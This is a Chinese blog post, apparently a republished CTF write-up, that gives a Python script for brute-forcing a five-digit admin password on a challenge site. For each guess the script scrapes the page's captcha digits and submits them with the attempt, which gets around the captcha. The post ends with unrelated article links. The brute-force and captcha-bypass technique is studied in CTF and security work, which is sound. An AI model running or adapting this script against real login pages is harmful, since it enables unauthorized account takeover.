爆破脚本+过验证码
来源:互联网 发布:室内效果图制作软件 编辑:程序博客网 时间:2024/06/05 08:49
原题链接:http://ctf1.shiyanbar.com/shian-s/
世安杯线上赛的一道题目,,,主要是仔细,,,查看源码
这就很明显了,爆破,坑点在于有验证码
脚本附在下面,,,
__author__="GETF"import requestsimport refrom requests.exceptions import RequestException#第一次获取验证码def D(s): url = "http://ctf1.shiyanbar.com/shian-s/" html=s.get(url) r = html.text.encode('ISO-8859-1').decode(html.apparent_encoding) pattern = re.compile(r'(\d)(\d)(\d)') code = pattern.findall(r) randcode = code[0][0] + code[0][1] + code[0][2] return randcodedef get_one_page(url,s): try: response=s.get(url=url) if response.status_code == 200:#print(response.text) #print(response.encoding) #print(response.apparent_encoding) r=response.text #print(requests.utils.get_encodings_from_content(r)[0]) #a=r.encode('ISO-8859-1').decode(requests.utils.get_encodings_from_content(r)[0]) #print(a) print('------------------------------------') b = r.encode('ISO-8859-1').decode(response.apparent_encoding) if(len(b) != 145): print(b) return None except RequestException: return Nonedef main(): for i in range(0,10): for j in range(0,10): for k in range(0,10): for m in range(0,10): for n in range(0,10): payload = '{0}{1}{2}{3}{4}'.format(i,j,k,m,n) print(payload) s = requests.session() s.get("http://ctf1.shiyanbar.com/shian-s/") randcode = D(s) url = 'http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={0}&randcode={1}'.format(payload,randcode) get_one_page(url,s)if __name__=='__main__': main()
阅读全文
1 0
- 爆破脚本+过验证码
- Discuz爆破无视验证码
- burpsuite爆破密码(含验证码)
- python脚本网址爆破
- PKav HTTP Fuzzer 爆破带有简单验证码的系统
- ipc$爆破密码脚本测试
- Python | MD5爆破及Base64/Base32爆破解密脚本
- python应用最多的场景还是web快速开发、爬虫、自动化运维:写过简单网站、写过自动发帖脚本、写过收发邮件脚本、写过简单验证码识别脚本。
- 爆破。
- dedecms全版本设计缺陷导致验证码绕过(可用于爆破等)
- burpsuite 插件开发——简单验证码爆破插件checkcode
- CTF writeup:python脚本爆破zip密码
- 一键部署防爆破ssh脚本
- 【讨论】网络验证也能爆破?
- 在JSP中动态生成随机验证码,登录时后台校验验证码,以及如何避免同一个验证码被重复提交爆破密码
- 客户端脚本验证码总结
- 客户端脚本验证码总结
- 识别12306验证码脚本
- leetcode#9. Palindrome Number
- Java高并发--线程池
- 【JAVASE_学习笔记】数组
- 贪婪方法——贪婪方法和动态规划的比较:背包问题
- c++一个数组的求和
- 爆破脚本+过验证码
- Linux中的进程管理
- Oracle数据泵(Dump)导出、导入
- Android 交叉编译
- 将自定义函数 helloUDF2 注册到hive 源码中,并且重新编译hive
- 双链表的基本操作实现
- 2187
- VS2013编译c++一闪而过
- Android Studio在创建/导入项目的时候,一直处于building “XXX”gradle project info的解决办法